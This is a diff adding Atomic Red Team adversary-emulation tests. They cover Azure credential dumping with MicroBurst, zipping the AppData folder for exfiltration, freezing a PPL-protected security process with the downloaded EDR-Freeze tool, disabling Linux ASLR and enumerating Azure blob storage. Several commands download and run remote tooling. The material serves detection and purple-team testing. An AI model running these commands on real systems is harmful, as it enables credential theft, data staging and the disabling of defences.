+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+  - description: |
+      The Azure RM module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureRM -Force -allowclobber
+  - description: |
+      The Azure module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name Azure -Force -allowclobber
+  executor:
+    command: |
+      import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
+      $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+      Connect-AzureRmAccount -Credential $Credential
+      Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
+      cat #{output_file}
+    cleanup_command: |
+      remove-item #{output_file} -force -erroraction silentlycontinue
+    name: powershell
+    elevation_required: true
@@ -36,6 +36,8 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi

 - [Atomic Test #11 - Compress a File for Exfiltration using Makecab](#atomic-test-11---compress-a-file-for-exfiltration-using-makecab)

+- [Atomic Test #12 - Copy and Compress AppData Folder](#atomic-test-12---copy-and-compress-appdata-folder)
+

 <br/>

@@ -641,4 +643,68 @@ fsutil file createnew c:\Temp\sam.hiv 10485760



+<br/>
+<br/>
+
+## Atomic Test #12 - Copy and Compress AppData Folder
+Copies the AppData folder, compresses it, and cleans up temporary files.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 05e8942e-f04f-460a-b560-f7781257feec
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| destination_folder | Temporary copy location | Path | $env:USERPROFILE&#92;Desktop&#92;AppDataCopy|
+| zip_file_path | ZIP archive path | Path | $env:USERPROFILE&#92;Desktop&#92;AppDataBackup.zip|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$AppData="$env:USERPROFILE\AppData"
+$Copy="#{destination_folder}"
+$Zip="#{zip_file_path}"
+
+if (Test-Path $Copy) { Remove-Item $Copy -Recurse -Force }
+New-Item -ItemType Directory -Path $Copy | Out-Null
+
+Get-ChildItem $AppData -Recurse -Force | ForEach-Object {
+  $rel = $_.FullName.Substring($AppData.Length + 1)
+  $dest = Join-Path $Copy $rel
+  if ($_.PSIsContainer) { New-Item -ItemType Directory -Path $dest -Force | Out-Null }
+  else { Copy-Item $_.FullName -Destination $dest -Force -ErrorAction SilentlyContinue }
+}
+
+Add-Type -AssemblyName System.IO.Compression.FileSystem
+[System.IO.Compression.ZipFile]::CreateFromDirectory($Copy, $Zip, [System.IO.Compression.CompressionLevel]::Optimal, $false)
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Requires admin and .NET compression libraries
+##### Check Prereq Commands:
+```powershell
+if (-not ([Security.Principal.WindowsPrincipal] `
+    [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(`
+    [Security.Principal.WindowsBuiltInRole]::Administrator)) { exit 1 }
+if (-not (Test-Path "$env:USERPROFILE\AppData")) { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Run PowerShell as Administrator and ensure .NET compression assemblies are available.
+```
+
+
+
+
 <br/>
@@ -413,3 +413,48 @@ atomic_tests:
      makecab.exe #{input_file} #{output_file}
    cleanup_command: |
      del #{output_file}
+
+- name: Copy and Compress AppData Folder
+  auto_generated_guid: 05e8942e-f04f-460a-b560-f7781257feec
+  description: |
+    Copies the AppData folder, compresses it, and cleans up temporary files.
+  supported_platforms:
+    - windows
+  input_arguments:
+    destination_folder:
+      type: Path
+      default: $env:USERPROFILE\Desktop\AppDataCopy
+      description: Temporary copy location
+    zip_file_path:
+      type: Path
+      default: $env:USERPROFILE\Desktop\AppDataBackup.zip
+      description: ZIP archive path
+  dependencies:
+    - description: Requires admin and .NET compression libraries
+      prereq_command: |
+        if (-not ([Security.Principal.WindowsPrincipal] `
+            [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(`
+            [Security.Principal.WindowsBuiltInRole]::Administrator)) { exit 1 }
+        if (-not (Test-Path "$env:USERPROFILE\AppData")) { exit 1 }
+      get_prereq_command: |
+        Run PowerShell as Administrator and ensure .NET compression assemblies are available.
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $AppData="$env:USERPROFILE\AppData"
+      $Copy="#{destination_folder}"
+      $Zip="#{zip_file_path}"
+
+      if (Test-Path $Copy) { Remove-Item $Copy -Recurse -Force }
+      New-Item -ItemType Directory -Path $Copy | Out-Null
+
+      Get-ChildItem $AppData -Recurse -Force | ForEach-Object {
+        $rel = $_.FullName.Substring($AppData.Length + 1)
+        $dest = Join-Path $Copy $rel
+        if ($_.PSIsContainer) { New-Item -ItemType Directory -Path $dest -Force | Out-Null }
+        else { Copy-Item $_.FullName -Destination $dest -Force -ErrorAction SilentlyContinue }
+      }
+
+      Add-Type -AssemblyName System.IO.Compression.FileSystem
+      [System.IO.Compression.ZipFile]::CreateFromDirectory($Copy, $Zip, [System.IO.Compression.CompressionLevel]::Optimal, $false)
@@ -134,6 +134,10 @@ Additionally, adversaries may exploit legitimate drivers from anti-virus softwar

 - [Atomic Test #57 - Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57---disable-eventlog-application-etw-provider-via-registry---powershell)

+- [Atomic Test #58 - Freeze PPL-protected process with EDR-Freeze](#atomic-test-58---freeze-ppl-protected-process-with-edr-freeze)
+
+- [Atomic Test #59 - Disable ASLR Via sysctl parameters - Linux](#atomic-test-59---disable-aslr-via-sysctl-parameters---linux)
+

 <br/>

@@ -2436,4 +2440,214 @@ New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\Ev



+<br/>
+<br/>
+
+## Atomic Test #58 - Freeze PPL-protected process with EDR-Freeze
+This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cbb2573a-a6ad-4c87-aef8-6e175598559b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| processName | PPL-protected process name to target | string | SecurityHealthService|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Enable SeDebugPrivilege
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class TokenAdjuster {
+    [DllImport("advapi32.dll", SetLastError = true)]
+    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
+
+    [DllImport("advapi32.dll", SetLastError = true)]
+    public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
+
+    [DllImport("advapi32.dll", SetLastError = true)]
+    public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges,
+        ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);
+
+    [StructLayout(LayoutKind.Sequential, Pack = 1)]
+    public struct TOKEN_PRIVILEGES {
+        public int PrivilegeCount;
+        public long Luid;
+        public int Attributes;
+    }
+
+    public const int SE_PRIVILEGE_ENABLED = 0x00000002;
+    public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
+    public const uint TOKEN_QUERY = 0x0008;
+
+    public static bool EnableSeDebugPrivilege() {
+        IntPtr hToken;
+        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
+            return false;
+
+        long luid;
+        if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid))
+            return false;
+
+        TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
+        tp.PrivilegeCount = 1;
+        tp.Luid = luid;
+        tp.Attributes = SE_PRIVILEGE_ENABLED;
+
+        return AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
+    }
+}
+"@
+
+$result = [TokenAdjuster]::EnableSeDebugPrivilege()
+if ($result) {
+    Write-Host "SeDebugPrivilege enabled successfully." -ForegroundColor Green
+} else {
+    Write-Host "Failed to enable SeDebugPrivilege." -ForegroundColor Red
+    exit 1
+}
+
+# Get basic process info
+$process = Get-Process -Name $#{processName} -ErrorAction Stop
+$processName = $process.ProcessName
+Write-Host "Process Name: $processName)"
+Write-Host "PID: $($process.Id)"
+        
+# Get executable path and user info
+$query = "SELECT * FROM Win32_Process WHERE Name = '$processName.exe'"
+$wmiProcess = Get-WmiObject -Query $query
+
+$owner = $wmiProcess.GetOwner()
+    Write-Host "User: $($owner.Domain)\$($owner.User)"
+
+
+# Get the folder of the current script
+$scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
+
+# Download latest EDR-Freeze package and extract (force replace)
+$downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
+$zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
+Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
+try {
+    Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
+    Write-Host "Download completed: $zipPath" -ForegroundColor Green
+    $extractFolder = $scriptFolder
+    if (Test-Path $zipPath) {
+        Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
+        if (Test-Path $extractFolder) {
+            # Ensure target exe not locked; attempt to stop any running instance silently
+            Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
+        }
+        Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
+        # Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
+        $archive = $null
+        try {
+            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
+            foreach ($entry in $archive.Entries) {
+                if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
+                if ($entry.FullName.EndsWith('/')) { # directory entry
+                    $dirPath = Join-Path $extractFolder $entry.FullName
+                    if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
+                    continue
+                }
+                $destPath = Join-Path $extractFolder $entry.FullName
+                $destDir = Split-Path $destPath -Parent
+                if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
+                if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
+                try {
+                    # Use static extension method (PowerShell 5.1 compatible)
+                    [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
+                } catch {
+                    Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
+                }
+            }
+            Write-Host "Extraction completed." -ForegroundColor Green
+        } finally {
+            if ($archive) { $archive.Dispose() }
+        }
+    }
+} catch {
+    Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
+}
+
+# Wait 15s before putting targeted process before putting it in the comma
+Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 5
+Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 5
+Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 3
+Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow
+Start-Sleep -Seconds 2
+
+# Put targeted  process in the comma for 15s
+# Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
+$edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue |
+    Sort-Object LastWriteTime -Descending |
+    Select-Object -First 1 -ExpandProperty Name
+if (-not $edrFreezeExeName) {
+    Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
+    exit 1
+}
+
+$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
+Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
+Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow
+Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+Write-Output "File deleted: $edrFreezeExe"
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #59 - Disable ASLR Via sysctl parameters - Linux
+Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** ac333fe1-ce2b-400b-a117-538634427439
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sysctl -w kernel.randomize_va_space=0
+```
+
+#### Cleanup Commands:
+```bash
+sysctl -w kernel.randomize_va_space=2
+```
+
+
+
+
+
 <br/>
@@ -1200,3 +1200,173 @@ atomic_tests:
    cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}" -Name Enabled -Value 1 -PropertyType "DWord" -Force
    name: powershell
    elevation_required: true
+- name: Freeze PPL-protected process with EDR-Freeze
+  auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
+  description: This test utilizes the tool EDR-Freeze, which leverages the native Microsoft binary WerFaultSecure.exe to suspend processes protected by the Protected Process Light mechanism. PPL is a Windows security feature designed to safeguard critical system processes — such as those related to antivirus, credential protection, and system integrity — from tampering or inspection. These processes operate in a restricted environment that prevents access even from administrators or debugging tools, unless the accessing tool is signed and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently trusted by the operating system, EDR-Freeze is able to bypass these restrictions and temporarily freeze PPL-protected processes for analysis or testing purposes.
+  supported_platforms:
+  - windows
+  input_arguments:
+    processName:
+      type: string
+      default: "SecurityHealthService"
+      description: PPL-protected process name to target
+  executor:
+    command: |-
+      # Enable SeDebugPrivilege
+      Add-Type -TypeDefinition @"
+      using System;
+      using System.Runtime.InteropServices;
+
+      public class TokenAdjuster {
+          [DllImport("advapi32.dll", SetLastError = true)]
+          public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
+
+          [DllImport("advapi32.dll", SetLastError = true)]
+          public static extern bool LookupPrivilegeValue(string lpSystemName, string lpName, out long lpLuid);
+
+          [DllImport("advapi32.dll", SetLastError = true)]
+          public static extern bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges,
+              ref TOKEN_PRIVILEGES NewState, uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);
+
+          [StructLayout(LayoutKind.Sequential, Pack = 1)]
+          public struct TOKEN_PRIVILEGES {
+              public int PrivilegeCount;
+              public long Luid;
+              public int Attributes;
+          }
+
+          public const int SE_PRIVILEGE_ENABLED = 0x00000002;
+          public const uint TOKEN_ADJUST_PRIVILEGES = 0x0020;
+          public const uint TOKEN_QUERY = 0x0008;
+
+          public static bool EnableSeDebugPrivilege() {
+              IntPtr hToken;
+              if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))
+                  return false;
+
+              long luid;
+              if (!LookupPrivilegeValue(null, "SeDebugPrivilege", out luid))
+                  return false;
+
+              TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
+              tp.PrivilegeCount = 1;
+              tp.Luid = luid;
+              tp.Attributes = SE_PRIVILEGE_ENABLED;
+
+              return AdjustTokenPrivileges(hToken, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
+          }
+      }
+      "@
+
+      $result = [TokenAdjuster]::EnableSeDebugPrivilege()
+      if ($result) {
+          Write-Host "SeDebugPrivilege enabled successfully." -ForegroundColor Green
+      } else {
+          Write-Host "Failed to enable SeDebugPrivilege." -ForegroundColor Red
+          exit 1
+      }
+
+      # Get basic process info
+      $process = Get-Process -Name $#{processName} -ErrorAction Stop
+      $processName = $process.ProcessName
+      Write-Host "Process Name: $processName)"
+      Write-Host "PID: $($process.Id)"
+              
+      # Get executable path and user info
+      $query = "SELECT * FROM Win32_Process WHERE Name = '$processName.exe'"
+      $wmiProcess = Get-WmiObject -Query $query
+
+      $owner = $wmiProcess.GetOwner()
+          Write-Host "User: $($owner.Domain)\$($owner.User)"
+
+
+      # Get the folder of the current script
+      $scriptFolder = Split-Path -Parent $MyInvocation.MyCommand.Definition
+
+      # Download latest EDR-Freeze package and extract (force replace)
+      $downloadUrl = "https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip"
+      $zipPath = Join-Path $scriptFolder "EDR-Freeze_1.0.zip"
+      Write-Host "Downloading latest EDR-Freeze from $downloadUrl" -ForegroundColor Cyan
+      try {
+          Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop
+          Write-Host "Download completed: $zipPath" -ForegroundColor Green
+          $extractFolder = $scriptFolder
+          if (Test-Path $zipPath) {
+              Write-Host "Extracting archive to $extractFolder (overwriting existing files)" -ForegroundColor Cyan
+              if (Test-Path $extractFolder) {
+                  # Ensure target exe not locked; attempt to stop any running instance silently
+                  Get-Process -Name "EDR-Freeze_1.0" -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction SilentlyContinue
+              }
+              Add-Type -AssemblyName System.IO.Compression.FileSystem 2>$null
+              # Custom extraction routine (overwrite existing) compatible with .NET Framework (no bool overwrite overload)
+              $archive = $null
+              try {
+                  $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)
+                  foreach ($entry in $archive.Entries) {
+                      if ([string]::IsNullOrWhiteSpace($entry.FullName)) { continue }
+                      if ($entry.FullName.EndsWith('/')) { # directory entry
+                          $dirPath = Join-Path $extractFolder $entry.FullName
+                          if (-not (Test-Path $dirPath)) { New-Item -ItemType Directory -Path $dirPath -Force | Out-Null }
+                          continue
+                      }
+                      $destPath = Join-Path $extractFolder $entry.FullName
+                      $destDir = Split-Path $destPath -Parent
+                      if (-not (Test-Path $destDir)) { New-Item -ItemType Directory -Path $destDir -Force | Out-Null }
+                      if (Test-Path $destPath) { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }
+                      try {
+                          # Use static extension method (PowerShell 5.1 compatible)
+                          [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry, $destPath, $false)
+                      } catch {
+                          Write-Host "Failed to extract entry $($entry.FullName): $_" -ForegroundColor Yellow
+                      }
+                  }
+                  Write-Host "Extraction completed." -ForegroundColor Green
+              } finally {
+                  if ($archive) { $archive.Dispose() }
+              }
+          }
+      } catch {
+          Write-Host "Failed to download or extract EDR-Freeze: $_" -ForegroundColor Red
+      }
+
+      # Wait 15s before putting targeted process before putting it in the comma
+      Write-Host "Waiting 15s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 5
+      Write-Host "Waiting 10s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 5
+      Write-Host "Waiting 5s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 3
+      Write-Host "Waiting 2s before putting $processName in the comma" -ForegroundColor Yellow
+      Start-Sleep -Seconds 2
+
+      # Put targeted  process in the comma for 15s
+      # Discover the EDR-Freeze executable dynamically (pick most recent if multiple)
+      $edrFreezeExeName = Get-ChildItem -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue |
+          Sort-Object LastWriteTime -Descending |
+          Select-Object -First 1 -ExpandProperty Name
+      if (-not $edrFreezeExeName) {
+          Write-Host "No EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder" -ForegroundColor Red
+          exit 1
+      }
+
+      $edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName
+      Write-Host "Using EDR-Freeze executable: $edrFreezeExeName" -ForegroundColor Cyan
+      Write-Host "$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)" -ForegroundColor Yellow
+      Start-Process -FilePath $edrFreezeExe -ArgumentList ("$($process.Id) 15000") | Out-Null
+    cleanup_command: |-
+      Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+      Write-Output "File deleted: $edrFreezeExe"
+    name: powershell
+    elevation_required: true
+- name: Disable ASLR Via sysctl parameters - Linux
+  auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
+  description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0` which disables Address Space Layout Randomization (ASLR) in Linux.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sysctl -w kernel.randomize_va_space=0
+    cleanup_command: |
+      sysctl -w kernel.randomize_va_space=2
+    name: bash
+    elevation_required: true
@@ -559,9 +559,9 @@ deleting the log stream. Once it is deleted, the logs created by the attackers w
 ```sh
 aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
 echo "*** Log Group Created ***"
-aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
 echo "*** Log Stream Created ***"
-aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
 echo "*** Log Stream Deleted ***"
 aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
 echo "*** Log Group Deleted ***"
@@ -388,9 +388,9 @@ atomic_tests:
    command: |
      aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
      echo "*** Log Group Created ***"
-      aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+      aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
      echo "*** Log Stream Created ***"
-      aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+      aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
      echo "*** Log Stream Deleted ***"
      aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
      echo "*** Log Group Deleted ***"
@@ -14,6 +14,10 @@ Cloud service providers offer APIs allowing users to enumerate objects stored wi

 - [Atomic Test #2 - Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI](#atomic-test-2---azure---enumerate-storage-account-objects-via-shared-key-authorization-using-azure-cli)

+- [Atomic Test #3 - Azure - Scan for Anonymous Access to Azure Storage (Powershell)](#atomic-test-3---azure---scan-for-anonymous-access-to-azure-storage-powershell)
+
+- [Atomic Test #4 - Azure - Enumerate Azure Blobs with MicroBurst](#atomic-test-4---azure---enumerate-azure-blobs-with-microburst)
+

 <br/>

@@ -218,4 +222,117 @@ Install-Module -Name Az -Force



+<br/>
+<br/>
+
+## Atomic Test #3 - Azure - Scan for Anonymous Access to Azure Storage (Powershell)
+Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file. 
+The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information. 
+See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 146af1f1-b74e-4aa7-9895-505eb559b4b0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| base_name | Azure storage account name to test | string | T1619Test2|
+| output_file | File to output results to | string | $env:temp&#92;T1619Test2.txt|
+| container_name | Container name to search for (optional) | string | |
+| blob_name | Blob name to search for (optional) | string | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
+catch [system.net.webexception]
+{if($_.Exception.Response -ne $null)
+{$Response = $_.Exception.Response.GetResponseStream()
+$ReadResponse = New-Object System.IO.StreamReader($Response)
+$ReadResponse.BaseStream.Position = 0
+$responseBody = $ReadResponse.ReadToEnd()}
+else {$responseBody = "The storage account could not be anonymously accessed."}}
+"Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
+```
+
+#### Cleanup Commands:
+```powershell
+remove-item #{output_file} -erroraction silentlycontinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Azure - Enumerate Azure Blobs with MicroBurst
+Upon successful execution, this test will utilize a wordlist to enumerate the public facing containers and blobs of a specified Azure storage account. 
+See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/ .
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 3dab4bcc-667f-4459-aea7-4162dd2d6590
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| base | Azure blob keyword to enumerate (Example, storage account name) | string | secure|
+| output_file | File to output results to | string | $env:temp&#92;T1619Test1.txt|
+| wordlist | File path to keywords for search permutations | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;permutations.txt|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
+Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"
+```
+
+#### Cleanup Commands:
+```powershell
+remove-item #{output_file} -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
+##### Check Prereq Commands:
+```powershell
+if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
+```
+##### Description: The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
+##### Check Prereq Commands:
+```powershell
+if (test-path "#{wordlist}"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}"
+```
+
+
+
+
 <br/>
@@ -158,3 +158,84 @@ atomic_tests:
      Write-Output "Removed #{output_file}"
    name: powershell
    elevation_required: false
+- name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
+  auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
+  description: |
+    Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file. 
+    The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information. 
+    See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service     
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    base_name:
+      description: Azure storage account name to test
+      type: string
+      default: T1619Test2
+    output_file:
+      description: File to output results to
+      type: string
+      default: $env:temp\T1619Test2.txt
+    container_name:
+      description: Container name to search for (optional)
+      type: string
+      default:
+    blob_name:
+      description: Blob name to search for (optional)
+      type: string
+      default:
+  executor:
+    command: |
+      try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
+      catch [system.net.webexception]
+      {if($_.Exception.Response -ne $null)
+      {$Response = $_.Exception.Response.GetResponseStream()
+      $ReadResponse = New-Object System.IO.StreamReader($Response)
+      $ReadResponse.BaseStream.Position = 0
+      $responseBody = $ReadResponse.ReadToEnd()}
+      else {$responseBody = "The storage account could not be anonymously accessed."}}
